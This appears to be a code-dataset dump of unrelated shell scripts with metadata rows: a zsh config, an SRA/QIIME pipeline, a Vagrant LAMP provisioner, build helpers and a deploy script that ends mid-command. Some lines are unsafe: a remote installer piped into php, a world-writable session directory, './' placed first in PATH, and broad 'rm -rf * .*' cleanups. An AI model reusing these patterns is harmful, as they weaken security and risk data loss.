# You can set one of the optional three formats:
# "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
# or set a custom format using the strftime function format specifications,
# see 'man strftime' for details.
# HIST_STAMPS="mm/dd/yyyy"
# Would you like to use another custom folder than $ZSH/custom?
# ZSH_CUSTOM=/path/to/new-custom-folder
# Which plugins would you like to load?
# Standard plugins can be found in ~/.oh-my-zsh/plugins/*
# Custom plugins may be added to ~/.oh-my-zsh/custom/plugins/
# Example format: plugins=(rails git textmate ruby lighthouse)
# Add wisely, as too many plugins slow down shell startup.
plugins=(git sudo fancy-ctrl-z zsh_reload taskwarrior virtualenv pyenv zsh-autosuggestions fzf wd z fast-syntax-highlighting)
source $ZSH/oh-my-zsh.sh
# User configuration
# export MANPATH="/usr/local/man:$MANPATH"
# You may need to manually set your language environment
# export LANG=en_US.UTF-8
# Preferred editor for local and remote sessions
# if [[ -n $SSH_CONNECTION ]]; then
# export EDITOR='vim'
# else
# export EDITOR='mvim'
# fi
# Compilation flags
# export ARCHFLAGS="-arch x86_64"
# Set personal aliases, overriding those provided by oh-my-zsh libs,
# plugins, and themes. Aliases can be placed here, though oh-my-zsh
# users are encouraged to define aliases within the ZSH_CUSTOM folder.
# For a full list of active aliases, run `alias`.
#
# Example aliases
# alias zshconfig="mate ~/.zshrc"
# alias ohmyzsh="mate ~/.oh-my-zsh"
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
if [[ $TERM == (dumb|linux) ]]; then
POWERLEVEL9K_CONFIG_FILE=~/.p10k-portable.zsh
else
POWERLEVEL9K_CONFIG_FILE=~/.p10k.zsh
fi
[[ ! -f $POWERLEVEL9K_CONFIG_FILE ]] || source $POWERLEVEL9K_CONFIG_FILE
# Add Games to PATH
export PATH=/usr/games:$PATH
## fzf Fuzzy Finder
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
## pyenv
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
# colorls
# export PATH="$PATH:/home/subhaditya/.gem/ruby/2.7.0/bin/"
# alias ls="colorls"
# my_run_bat () { cat $1 | powershell.exe -Command "& {cmd.exe}" - }
# my_run_bat_2 () { cat $1 | powershell.exe -Command "& {cd c:; cmd.exe /Q}" - }
# my_run_bat_3 () { powershell.exe "cd c:; & \"$( wslpath -w $1)\"" }
my_run_bat_4 () { # {{{
if [[ $* =~ (-h) || -z $* ]]
then echo "Execute Windows Batch files from WSL
Usage: runbat [options] path
Options:
-h or --help Show this help window and exit
Executes the specified file at the C: drive.
If C: is unavailable, then executes at the CMD default (Windows) directory."
return; fi
powershell.exe "cd c:; & \"$( wslpath -w $1)\""
} # }}}
alias runbat=my_run_bat_4
alias gaav="git add --all --verbose"
alias gdh="git diff HEAD"
alias gdh1="git diff HEAD~1 HEAD"
my_diff () { colordiff -u $* | less }
alias diff=my_diff
alias la1="la -1"
yays () { yay -S $(yay -Ss $* | cut -d' ' --fields=1 | grep . | fzf --multi) --needed }
yayss () { yay -Ss $* }
pacs () { sudo pacman -S $(pacman -Ss $* | cut -d' ' --fields=1 | grep . | cut --fields=2 -d'/' | fzf --multi) --needed }
pacr () { sudo pacman -R $(pacman -Qe $* | cut --fields=2 -d'/' | cut --fields=1 -d' '| fzf --multi --preview-window 'right:50%:nohidden:wrap' --preview 'pacman -Qi {} | grep "Name\|Version\|Description\|Required By\|Optional For\|Install Reason\|Size\|Groups" | cat') }
pacrr () { sudo pacman -R $(pacman -Q $* | cut --fields=2 -d'/' | cut --fields=1 -d' '| fzf --multi --preview-window 'right:50%:nohidden:wrap' --preview 'pacman -Qi {} | grep "Name\|Version\|Description\|Required By\|Optional For\|Install Reason\|Size\|Groups" | cat') }
alias ydl=youtube-dl
alias pacss="pacman -Ss"
my_calendar () { while true; do tput civis;clear; cal; sleep $(( 24*60*60 - `date +%H`*60*60 - `date +%M`*60 - `date +%S` )); done }
emojiinputtool () { while true; do
codepoints="$(jome -f cp -p U)"
if [ $? -ne 0 ]; then
exit 1
fi
xdotool key --delay 20 $codepoints
done }
bindkey "^[" vi-cmd-mode
alias monitorsetuptool="echo mons"
alias datausage=vnstat
alias ":q"=exit
alias ":Q"=exit
alias "cd.."="cd .."
vpn () { protonvpn $* && return true; echo "Running as root ..."; sudo protonvpn $*; timedatectl set-timezone Asia/Kolkata }
vimman () { man $* | vim - }
nvimman () { man $* | nvim - }
export EDITOR=nvim
export DIFFPROG="nvim -d"
export PATH=/home/subhaditya/.local/bin:$PATH
# pyenv global $(for x in $(pyenv version | cut -f1 -d' '); do echo -n "$x "; done)
# pyenv global system pypy3.6-7.3.1
export PATH=/home/subhaditya/Notes/:$PATH
alias notes=notes.sh
# if [[ -z $DISPLAY ]]; then export DISPLAY=:0; fi
my_man () { if [[ $* = 'z' ]] ; then sh -c "man ~/.oh-my-zsh/plugins/z/z.1"; else sh -c "man $*"; fi }
# alias man=my_man
export PATH=./:$PATH
alias cameradisable="sudo chmod -r /dev/video*"
alias cameraenable="sudo chmod ug+r /dev/video*"
alias camerastatus="l /dev/video*"
if ! [[ -z $MY_NVIM_BG ]] && [[ $KITTY_WINDOW_ID -eq 1 ]]
then echo 'if [[ $MY_NVIM_BG == "light" ]];then export MY_NVIM_BG="dark"; alias colorls="colorls"; export BAT_THEME="gruvbox (Dark) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
fi
# get_theme () {
# if my_variable_for_color=$(kitty @ get-colors)
# then
# if [[ $( echo $my_variable_for_color | grep color0 | cut -d'#' -f2) = '000000' ]]
# then
# export MY_NVIM_BG='light'
# echo 'if [[ $MY_NVIM_BG == "dark" ]];then export MY_NVIM_BG="light"; fi' > ~/.config/kitty/custom_zsh_source
# else
# export MY_NVIM_BG='dark'
# echo > ~/.config/kitty/custom_zsh_source
# fi
# fi
# }
get_theme () { source ~/.config/kitty/custom_zsh_source }
if ! [[ -z $MY_NVIM_BG ]]; then source ~/.config/kitty/custom_zsh_source; fi
toggle_theme () { # {{{
get_theme
if [[ $MY_NVIM_BG == 'dark' ]]
then export MY_NVIM_BG='light'
kitty @ set-colors -a -c ~/.config/kitty/gruvbox_light_hard.conf
alias colorls="colorls --light"
export BAT_THEME="gruvbox (Light) (Hard)"
echo 'if [[ $MY_NVIM_BG == "dark" ]];then export MY_NVIM_BG="light"; alias colorls="colorls --light"; export BAT_THEME="gruvbox (Light) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
else if [[ $MY_NVIM_BG == 'light' ]]
then export MY_NVIM_BG='dark'
kitty @ set-colors -a -c ~/.config/kitty/gruvbox_dark_hard.conf
alias colorls="colorls"
export BAT_THEME="gruvbox (Dark) (Hard)"
echo 'if [[ $MY_NVIM_BG == "light" ]];then export MY_NVIM_BG="dark"; alias colorls="colorls"; export BAT_THEME="gruvbox (Dark) (Hard)"; fi' > ~/.config/kitty/custom_zsh_source
fi
fi
echo -n "get_theme\n" | kitty @ send-text -t="title:subhaditya@$(cat /proc/sys/kernel/hostname)" --stdin
} # }}}
alias to=toggle_theme
alias telebit=~/telebit
telebit_share_cur_dir () {
trap 'echo; echo Stopping telebit; telebit disable' INT
echo "https://wicked-emu-8.telebit.io/" | clipcopy
if [[ -z $* ]]
then
telebit http ./.
else
telebit http $*
fi
telebit enable
while sleep 1; do echo -n ''; done
}
alias telebit_share=telebit_share_cur_dir
alias py=python
export PYTHONSTARTUP=~/.pythonrc
alias g=git
alias ga='git add'
alias gaa='git add --all'
alias gaav='git add --all --verbose'
alias gc='git commit -v'
alias gca='git commit -v -a'
alias gp='git push'
alias gcm=
# alias gcma=
my_gcm () { git commit -m "$*" }
# my_gcma () { git commit --amend -m "$*" }
alias gcm=my_gcm
# alias gcma=my_gcma
alias gpull="git pull"
alias cal3="cal -3"
alias n=nvim
if [[ $TERM =~ 'kitty' ]]; then alias icat="kitty +kitten icat"; fi
alias qr="qrencode -t UTF8"
alias nvimvenv="source ~/.config/nvim/venv/bin/activate"
alias nvimdiff="nvim -d"
alias theme_light="gsettings set org.gnome.desktop.interface gtk-theme Layan-light && gsettings set org.gnome.desktop.interface icon-theme Tela-blue"
alias theme_dark="gsettings set org.gnome.desktop.interface gtk-theme Layan-dark && gsettings set org.gnome.desktop.interface icon-theme Tela-blue-dark"
# See https://sw.kovidgoyal.net/kitty/faq.html#i-get-errors-about-the-terminal-being-unknown-or-opening-the-terminal-failing-when-sshing-into-a-different-computer
if [[ $TERM =~ 'kitty' ]]; then
function my_ssh () {
if kitty +kitten ssh $* || ssh $*
then unalias ssh
fi
}
alias ssh-kitty=my_ssh
alias ssh_kitty=my_ssh
alias kitty-ssh=my_ssh
alias kitty_ssh=my_ssh
fi
alias sql_start="systemctl start mariadb"
alias sql_stop="systemctl stop mariadb"
alias init.vim="nvim ~/.config/nvim/init.vim"
alias bspwmrc="nvim ~/.config/bspwm/bspwmrc"
alias sxhkdrc="nvim ~/.config/sxhkd/sxhkdrc"
alias zshrc="nvim ~/.zshrc"
alias wifi="nmcli dev wifi list"
alias shrug="echo -n '¯\_(ツ)_/¯' | clipcopy"
alias copy=clipcopy
alias picom_restart="killall picom; sleep 0.5 && sh -c 'picom &'"
alias lock="i3lock -c 00000040 -k --pass-media-keys --pass-screen-keys --radius 180 --ring-width 20 --linecolor 00000000 --ringcolor=ffffff --keyhlcolor=000000 --insidecolor=ffffff --indicator --ringwrongcolor ff2134 --separatorcolor 00000000 --ringvercolor 008cf7 --insidevercolor 008cf7 --insidewrongcolor ff2134 --pass-power-keys --refresh-rate=0.5 --bshlcolor=ff2134 --datestr='%A, %d %b %Y' --redraw-thread &> /dev/null"
alias winvm_1cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 1 && exec VBoxManage startvm Win10"
alias winvm_2cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 2 && exec VBoxManage startvm Win10"
alias winvm_4cpu="bspc desktop --layout monocle; VBoxManage modifyvm Win10 --cpus 4 && exec VBoxManage startvm Win10"
bspwm_delete_monitor() { #{{{
local monitor
local desktop
for monitor in "$@"
do
for desktop in $(bspc query -D -m "$monitor")
do
bspc desktop "$desktop".occupied --to-monitor focused
done
bspc monitor "$monitor" --remove
done
}
_bspwm_delete_monitor() { compadd $(bspc query -M -m .!focused --names) }
compdef _bspwm_delete_monitor bspwm_delete_monitor #}}}
usb() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
PATH=$PATH_SAVED
for _ in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
do
eval $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
$lsblk $PATH -t -o NAME,SIZE,TYPE,LABEL,MOUNTPOINT
PATH=$PATH_SAVED
done
}
usb_mount() { #{{{
udisksctl mount -b "$@"
echo
usb
}
_usb_mount_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="part"' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_mount_completion usb_mount #}}}
usb_unmount() { #{{{
udisksctl unmount -b "$@"
echo
usb
}
_usb_unmount_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE,MOUNTPOINT | grep 'RM="1"' | grep 'TYPE="part"' | grep -v 'MOUNTPOINT=""' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_unmount_completion usb_unmount #}}}
usb_poweroff() { #{{{
udisksctl power-off -b "$@"
echo
usb
}
_usb_poweroff_completion() {
local lsblk
local PATH_SAVED
lsblk=$(where lsblk)
PATH_SAVED=$PATH
local PATH
local to_eval
PATH=$PATH_SAVED
for to_eval in $(lsblk -P -o PATH,RM,TYPE | grep 'RM="1"' | grep 'TYPE="disk"' | cut -d' ' -f1)
do
eval $to_eval
compadd $PATH
done
PATH=$PATH_SAVED
}
compdef _usb_poweroff_completion usb_poweroff #}}}
alias usbmount=usb_mount
alias usbunmount=usb_unmount
alias usbpoweroff=usb_poweroff
compdef usbmount=usb_mount
compdef usbunmount=usb_unmount
compdef usbpoweroff=usb_poweroff
_udisksctl_completion() { # {{{
local suggestions=$(udisksctl complete "${COMP_LINE}" ${COMP_POINT})
COMPREPLY=($(compgen -W "$suggestions" -- ""))
}
autoload -U bashcompinit
complete -o nospace -F _udisksctl_completion udisksctl
# }}}
| true
|
5834ba5786f794f33fee8446ba540131d2f4d75f
|
Shell
|
gzahn/tools
|
/SRA_Download_and_Process.sh
|
UTF-8
| 4,640
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/sh
############################
#SRA online search terms:
#ITS1
#
#SRA online filters:
#Platform = Illumina
############################
# This script takes the standard downloads from the SRA read selector (the table and accession list) and uses them to download all the associated fastq files from the Sequence Read Archive.
# It then filters for read quality (default 95% of bases with at least a 25 phred score) removes empty reads and reverse reads, converts to fasta files and makes a valid QIIME mapping file based on the sample names.
# Next, it constructs one BIG fasta file, ready for OTU picking or other pre-processing steps.
#This script assumes the following: 1. you have SRATools installed on your machine. Make sure to check the verison and location and adjust line 29
# 2. You have downloaded a table and list of accession numbers from the SRA read selector website. Table contains metadata for each accession.
# 3. You have QIIME and the fastx_toolkit installed and in your $PATH
# usage: bash SRA_Download_and_Process.sh /PATH/TO/SRA_RUN_TABLE.TXT /PATH/TO/SRA_ACCESSION_LIST.TXT /OUTPUT/DIRECTORY/PATH/FOR/READS_AND_MAPPING_FILES
# Determine total disk size of downloads based on metadata table (field 16) (this may not be robust...fix to use column name "Mbytes")
cut -f 16 $1 > file_sizes
paste <(awk '{sum += $1} END {print sum}' file_sizes) <(echo "Mbytes Total... Downloads will start in 10 seconds.")
#pause to sink in, give time to cancel
sleep 10
echo "Downloading fastq files associated with SRA accession numbers..."
# use SRA toolkit fastq-dump to download fastq files for each associated SRA accession (Fwd and Rev runs in separate reads, gzip compression, no technical reads)
cat $2 | xargs ~/sratoolkit.2.8.1-2-ubuntu64/bin/fastq-dump --split-files --bzip2 --skip-technical --readids --dumpbase --outdir $3
echo "Removing reverse reads...screw 'em!"
#deal with reverse reads....probably just dump them, at least until I can incorporate PEAR matching. Probably not worth it though.
rm *_2.fastq.bz2
echo "Unzipping fastq files..."
#unzip fastqs
bzip2 -d *.bz2
echo "Filtering fastqs to remove low-quality reads..."
#quality filter fastq (min 95% bases with 25 phred score)
for fn in *.fastq; do fastq_quality_filter -i $fn -q 25 -p 95 -o $fn.QC_25-95 -v >> QC-25-95.out; done
echo "Converting fastq to fasta..."
#convert to fasta
for fn in *.QC_25-95; do convert_fastaqual_fastq.py -f $fn -c fastq_to_fastaqual -F; done
echo "Removing empty files..."
#remove empty fasta files
find . -type f -empty -exec rm {} \;
echo "Making list of file names..."
#make list of filenames
ls -1 *.fna > filenames
###make lists of sampleIDs/barcodes/linkerprimers/descriptions
echo "Making mapping file for QIIME..."
#make list of valid (non-empty) samples to build mapping file for QIIME
cut -d "_" -f1 filenames > valid_sampleIDs
#count number of valid samples and assign to variable
count="$(wc -l valid_sampleIDs | cut -d " " -f 1)"
#make unique descriptions using number of valid samples
paste -d "_" valid_sampleIDs <(echo $(yes SRAExp | head -n$count) | tr " " "\n") > valid_descriptions
#make bogus barcodes and primers using number of valid samples
echo $(yes ACGTACGTACGT | head -n$count) | tr " " "\n" > valid_barcodes
echo $(yes TAGATAG | head -n$count) | tr " " "\n" > valid_linkers
#add header labels to mapping file
paste <(echo -e "#SampleID\tBarcodeSequence\tLinkerPrimerSequence\tInputFileName") <(head -1 $1) <(echo "Description") >> mapping_file.tsv
#construct mapping file
paste valid_sampleIDs valid_barcodes valid_linkers <(while read line; do paste <(grep $line filenames) <(grep $line $1) <(grep $line valid_descriptions); done < valid_sampleIDs) >> mapping_file.tsv
echo "Cleaning up intermediate files..."
#remove qual scores
rm *.qual
#package up fastqs and fastas
mkdir ./Fastqs
mkdir ./Fastqs/Raw
zip QC_fastqs *.QC_25-95
rm *.QC_25-95
zip Raw_fastqs *.fastq
mv Raw_fastqs.zip ./Fastqs
mv QC_fastqs.zip ./Fastqs
mv *.fastq ./Fastqs/Raw
gzip ./Fastqs/Raw/*.fastq
mv QC-25-95.out ./Fastqs
echo "Creating main fasta file, indexed for QIIME..."
add_qiime_labels.py -i ./ -m ./mapping_file.tsv -c InputFileName
echo "Validating mapping file..."
validate_mapping_file.py -m mapping_file.tsv
sleep 3
rm mapping_file.tsv.html mapping_file.tsv.log overlib.js
mkdir Intermed_files
mv valid* file* Intermed_files
mkdir ./Fastas
mv *.fastq.fna ./Fastas
zip QC_Fastas ./Fastas/*.fna
echo -e "Process complete.\nReady for OTU-Picking.\n\nIf errors were raised in mapping file validation, use the corrected mapping file in QIIME."
| true
|
1dbefbec2de69baa26d6cd3d0cf8165a00fd47f4
|
Shell
|
yksi/Restaurant-Application
|
/data/deploy/development/provision.sh
|
UTF-8
| 1,606
| 2.734375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Vagrant provisioner for a CentOS 6 LAMP development box:
# EPEL + webtatic repos, Apache, MariaDB, PHP 7.0, code analysers, composer,
# then installs the project itself. Steps are order-dependent (repos before
# packages, configs before service start).
#Update centos
sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
sudo rpm -Uvh https://mirror.webtatic.com/yum/el6/latest.rpm
sudo yum -y update
#Install tools
sudo yum install -y tar bzip2 git zip unzip
#Install configs
# Overwrites system config from the synced folder; -Rf clobbers existing files.
sudo cp -Rf /vagrant/soft-group-test/data/deploy/development/etc/* /etc/
echo export APPLICATION_ENV="development" >> /etc/bashrc
#Install httpd
sudo yum install -y httpd
sudo service httpd start
sudo chkconfig httpd on
#Install mariaDB
sudo yum install -y MariaDB-server MariaDB-client
sudo service mysql start
sudo chkconfig mysql on
#Install PHP
sudo yum install -y php70w php70w-opcache
sudo yum install -y php70w-pear php70w-devel php70w-pdo php70w-pecl-redis php70w-bcmath \
php70w-dom php70w-eaccelerator php70w-gd php70w-imap php70w-intl php70w-mbstring \
php70w-mcrypt php70w-mysqlnd php70w-posix php70w-soap php70w-tidy php70w-xmlrpc \
php70w-pecl-xdebug php70w-zip
# World-writable session dir so httpd can write PHP sessions (dev box only).
sudo chmod 777 -R /var/lib/php/session
#Install code analyser
sudo pear install PHP_CodeSniffer
wget http://static.phpmd.org/php/latest/phpmd.phar
sudo mv phpmd.phar /usr/bin/phpmd
sudo chmod +x /usr/bin/phpmd
#Restart services
sudo service httpd restart
sudo service mysql restart
# NOTE(review): redis is restarted here but never installed above — presumably
# pulled in by php70w-pecl-redis config or the copied /etc files; confirm.
sudo service redis restart
#Install composer
curl -sS https://getcomposer.org/installer | php
mv composer.phar /usr/local/bin/composer
#Install project
mysql -u root -e "DROP DATABASE IF EXISTS development; CREATE DATABASE development;";
cd /vagrant/soft-group-test; php /usr/local/bin/composer install
| true
|
1a100e7645e8257f608c4c6c1bdb80909bf9d44b
|
Shell
|
CGS-Purdue/record-the-earth-app
|
/App/.bin/_ts
|
UTF-8
| 1,098
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
# EXPO HELPER — TypeScript build wrapper.
# Builds the project with either the `ts` CLI (RUN_TYPE_NOC=yes) or plain
# `tsc`, forwarding any additional command-line arguments.
# -------------
# BUG FIX: the file previously repeated the shebang, BASE_DIR assignment and
# `source` of .env a second time; the duplicate header was removed so .env is
# sourced exactly once (assumed side-effect free — confirm).
BASE_DIR="$(npm prefix)"
source "${BASE_DIR}/../.env"
# tsc --removeComments --module ESNext --target ESNEXT --pretty
# ts build --removeComments --jsx react-native --module ESNext --target ESNEXT --pretty --declaration **/*.ts **/*.tsx

# NOTE(review): the binary paths below use $BASE_PATH, not $BASE_DIR —
# presumably BASE_PATH is exported from .env; verify.
if [ "$RUN_TYPE_NOC" == "yes" ]; then
  # --------------------------------- #
  #  USE REGULAR TS BY SETTING --NO-C #
  # --------------------------------- #
  "$BASE_PATH"/node_modules/.bin/ts \
    build \
    --removeComments \
    --jsx react-native \
    --module ESNext \
    --target ESNEXT \
    --pretty \
    --declaration \
    **/*.ts \
    **/*.tsx \
    "$@"
else
  # -------------------------------- #
  #  USES TSC BY DEFAULT             #
  # -------------------------------- #
  "$BASE_PATH"/node_modules/.bin/tsc \
    --removeComments \
    --module ESNext \
    --target ESNEXT \
    --skipLibCheck \
    --stripInternal \
    --pretty \
    "$@"
fi
| true
|
67053c37bb25c684a23bc64f05cb0559c47ea908
|
Shell
|
s333770/LinuxTesting
|
/Operativsystemer/omDegScript.sh
|
UTF-8
| 295
| 2.796875
| 3
|
[] |
no_license
|
#! /bin/bash
# Print basic information about the current user and environment.
echo "Ditt brukernavn er ${USER}"
echo "Prosessen du kjører er $$"
# Modern $( ) command substitution instead of backticks.
echo "Operativsystemet er $(uname)"
echo "Din hjemmekatalog: ${HOME}"
# BUG FIX: `filer=ls /home/andreas/ | wc -l` never assigned anything — it ran
# the directory itself as a command with filer=ls in its environment. Use
# command substitution; stderr suppressed in case the directory is absent.
filer=$(ls /home/andreas/ 2>/dev/null | wc -l)
#kataloger=$(ls -ld */ | wc -l)
echo "Antall filer i hjemmekatalog: $filer"
#echo "Antall kataloger: $kataloger"
| true
|
b41d6d2b9a0276f450bb04a63bfb243fc31b68fe
|
Shell
|
fxha/dotfiles
|
/.bash_logout
|
UTF-8
| 356
| 2.890625
| 3
|
[
"MIT"
] |
permissive
|
# ~/.bash_logout
# Executed by bash when a login shell exits.

# On the outermost console shell, wipe the screen to protect privacy.
if [ "$SHLVL" = 1 ]; then
  if [ -x /usr/bin/clear_console ]; then
    /usr/bin/clear_console -q
  fi
fi

# Shut down the ssh agent that was started for this session, if any.
if [ -n "$SSH_AGENT_PID" ]; then
  eval `/usr/bin/ssh-agent -k`
fi

# Source machine-specific logout hooks when present.
if [ -f ~/.bash_logout.local ]; then
  . ~/.bash_logout.local
fi
| true
|
117cc42210b011a5f6d95e45b2003813cadc93fe
|
Shell
|
Leonardrae/scripts
|
/sec3-exec2.sh
|
UTF-8
| 270
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Classify $1 and exit with a matching code:
#   regular file -> 0, directory -> 1, anything else -> 2.
#
# BUG FIX: the original last line was
#   [ -a "$1" ] || echo "..." && exit 2
# Because `||`/`&&` are left-associative, an existing path that is neither a
# regular file nor a directory fell through to `exit 2` WITHOUT printing the
# message. Rewritten as an explicit if/elif/else (and `-a` is deprecated).
if [ -f "$1" ]; then
  echo "File ${1} is a file, script will exit with code 0"
  exit 0
elif [ -d "$1" ]; then
  echo "File ${1} is a directory, script will exit with code 1"
  exit 1
else
  echo "File ${1} Does Not Exist, script will exit with code 2"
  exit 2
fi
| true
|
0351721f123179a6c1073ce011b5e5507770f414
|
Shell
|
shone2567/work
|
/phase1/koji/sub_zpool_destroy.sh
|
UTF-8
| 532
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Tear down the test zpool "pool1" and remove all of its file-backed
# virtual devices (vdisks, vlogs, vcaches) plus the loop devices that
# backed the caches. Destructive: deletes directories under ~/temp/zfs.
sub_zpool_destroy(){
# Pattern used to find loop devices backing *.vcache files in losetup output.
local zfs_rcache_postfix="*\.vcache"
local zfs_vdisk_dir="$HOME/temp/zfs/vdisks"
local zfs_vlog_dir="$HOME/temp/zfs/vlogs"
local zfs_vcache_dir="$HOME/temp/zfs/vcaches"
local zpool="pool1"
sudo zpool destroy $zpool
# Show remaining pools/status for operator verification.
sudo zpool list
sudo zpool status
#remove all vdisks and vdevices
rm -r $zfs_vdisk_dir
rm -r $zfs_vlog_dir
rm -r $zfs_vcache_dir
#clean up the loop device
# Extract the /dev/loopN column for matching vcache backings and detach each.
sudo losetup | grep -E "$zfs_rcache_postfix" | cut -d " " -f 1 | xargs sudo losetup -d
}
sub_zpool_destroy
| true
|
875f01052eb459f2ff6d96365376aa62385699eb
|
Shell
|
neeltuk/High-Dimensional-Model-Explanations-An-Axiomatic-Approach
|
/code/script_for_BERT_predictions.sh
|
UTF-8
| 723
| 2.515625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Run BERT-large predictions over IMDB data slices 1001..1997 (step 4).
# Extra command-line arguments are forwarded verbatim to run_classifier.py.
BERT_BASE_DIR='/data/checkpoints/uncased_L-24_H-1024_A-16'
# BUG FIX: a previous assignment to the glue_data path was dead code
# (immediately overwritten) and has been removed.
DATASETS='../../../Data/imdb'
# Monitor outputs while the prediction loop runs.
tensorboard --logdir data/outputs &
for NUMBER in {1001..2000..4}
do
echo $NUMBER
python run_classifier.py \
	--task_name=IMDB \
	--do_train=false \
	--do_eval=false \
	--do_predict=true \
	--data_dir=$DATASETS/$NUMBER \
	--vocab_file=$BERT_BASE_DIR/vocab.txt \
	--bert_config_file=$BERT_BASE_DIR/bert_config.json \
	--init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \
	--max_seq_length=128 \
	--train_batch_size=32 \
	--learning_rate=2e-5 \
	--num_train_epochs=3 \
	--output_dir=data/outputs/$NUMBER \
	--model_dir=data/outputs/imdb \
	--gpu_number=4 \
	"$@"
done
| true
|
689dd56ed7c63c856567209c821a85b0310d2cc0
|
Shell
|
xxtbg/coredroidservice
|
/CoreDroid/build
|
UTF-8
| 583
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/sh
# Configure and build Mono 2.10.9 into ./out as a mostly-static binary.
# Interactive: pauses for Enter between configure and make.
echo "BUILD: setting env variables"
ROOT_PATH=`pwd`
OUT_PATH="$ROOT_PATH/out"
MONO_PATH="$ROOT_PATH/mono-2.10.9"
export CC="gcc"
export CXX="g++"
export LD="ld"
export CFLAGS=""
export CXXFLAGS="$CFLAGS"
export LDFLAGS=""
cd $MONO_PATH
./configure --prefix=$OUT_PATH --exec-prefix=$OUT_PATH --disable-mcs-build #--with-tls=pthread #--enable-static --disable-shared --with-static_mono=yes --with-shared_mono=no
# Force-disable ARM FPU support in the generated config.
echo "#define ARM_FPU_NONE 1" >> config.h
# Give the operator a chance to inspect/patch config.h before compiling.
echo "press enter to continue"
read TMP
make LDFLAGS="$LDFLAGS -all-static -pthread -lm -lrt -ldl" && make install
| true
|
e2c4f12807405848c0b080d6b24f66452d9589ab
|
Shell
|
liuyiyang123/zgit_shadow
|
/tools/zmaster_init_self.sh
|
UTF-8
| 4,148
| 3.140625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Prerequisites:
# (1) MaxStartups in /etc/ssh/sshd_config must be set to at least 1024
# (2) net.core.somaxconn in /etc/sysctl.conf must be at least 1024; run `sysctl -p` afterwards so it takes effect immediately
# (3) yum install openssl-devel
# Global variable shared across the deployment system
export zGitShadowPath=${HOME}/zgit_shadow2
zServAddr=$1
zServPort=$2
zShadowPath=$zGitShadowPath # system-wide global $zGitShadowPath
cd $zShadowPath
#git stash
#git pull # sometimes we do not want to update to the latest code
# Bake the master address/port into the deploy helpers. `eval` makes the
# shell expand ${zServAddr}/${zServPort} inside the single-quoted sed program.
eval sed -i 's%__MASTER_ADDR%${zServAddr}%g' ./tools/post-update
eval sed -i 's%__MASTER_PORT%${zServPort}%g' ./tools/post-update
eval sed -i 's%__MASTER_ADDR%${zServAddr}%g' ./tools/zhost_self_deploy.sh
eval sed -i 's%__MASTER_PORT%${zServPort}%g' ./tools/zhost_self_deploy.sh
# Kill any previously running watchdog and daemon instances (pids extracted
# from `ps` output via lookahead regexes on the command path).
kill -9 `ps ax -o pid,cmd | grep -v 'grep' | grep -oP "\d+(?=\s+\w*\s*${zShadowPath}/tools/zauto_restart.sh)"`
kill -9 `ps ax -o pid,cmd | grep -v 'grep' | grep -oP "\d+(?=\s+${zShadowPath}/bin/git_shadow)"`
mkdir -p ${zShadowPath}/bin
mkdir -p ${zShadowPath}/log
mkdir -p ${zShadowPath}/conf
touch ${zShadowPath}/conf/master.conf
rm -rf ${zShadowPath}/bin/*
# build libpcre2
# wget https://ftp.pcre.org/pub/pcre/pcre2-10.23.tar.gz
# mkdir ${zShadowPath}/lib/libpcre2_source/____build
# if [[ 0 -eq $? ]]; then
#     cd ${zShadowPath}/lib/libpcre2_source/____build && rm -rf * .*
#     cmake .. \
#         -DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libpcre2 \
#         -DBUILD_SHARED_LIBS=ON \
#         -DPCRE2_BUILD_PCRE2GREP=OFF \
#         -DPCRE2_BUILD_TESTS=OFF
#     cmake --build . --target install
# fi
# zLibPcrePath=${zShadowPath}/lib/libpcre2/lib64
# if [[ 0 -eq `ls ${zLibPcrePath} | wc -l` ]]; then zLibPcrePath=${zShadowPath}/lib/libpcre2/lib; fi
# build libssh2
mkdir ${zShadowPath}/lib/libssh2_source/____build
if [[ 0 -eq $? ]]; then
cd ${zShadowPath}/lib/libssh2_source/____build && rm -rf * .*
cmake .. \
-DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libssh2 \
-DBUILD_SHARED_LIBS=ON
cmake --build . --target install
fi
# Some distros install to lib64, others to lib — pick whichever is non-empty.
zLibSshPath=${zShadowPath}/lib/libssh2/lib64
if [[ 0 -eq `ls ${zLibSshPath} | wc -l` ]]; then zLibSshPath=${zShadowPath}/lib/libssh2/lib; fi
# build libgit2
mkdir ${zShadowPath}/lib/libgit2_source/____build
if [[ 0 -eq $? ]]; then
cd ${zShadowPath}/lib/libgit2_source/____build && rm -rf * .*
cmake .. \
